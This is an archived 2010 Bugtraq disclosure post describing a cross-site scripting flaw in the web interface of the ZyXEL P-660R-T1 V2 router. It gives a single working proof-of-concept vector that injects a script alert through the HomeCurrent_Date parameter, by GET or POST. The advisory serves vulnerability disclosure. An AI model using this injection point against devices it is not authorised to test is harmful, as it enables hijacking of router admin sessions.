lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <4CEBB443.7040604@xc0re.net> Date: Tue, 23 Nov 2010 17:32:03 +0500 From: Usman Saeed <usman@...re.net> To: bugtraq@...urityfocus.com Subject: ZyXEL P-660R-T1 V2 XSS ##################################################################################### # # Name : ZyXEL P-660R-T1 V2 XSS # Author : Usman Saeed from Xc0re Security Research Group # Homepage :http://www.xc0re.net # Dated : 22/11/2010 # ##################################################################################### Exploit: VECTOR :http://IP/Forms/home_1?&HomeCurrent_Date='<sCript>alert(1);</ScRiPt>'01%2F01%2F2000 This works with the post request ! As by default this value is sent through POST request.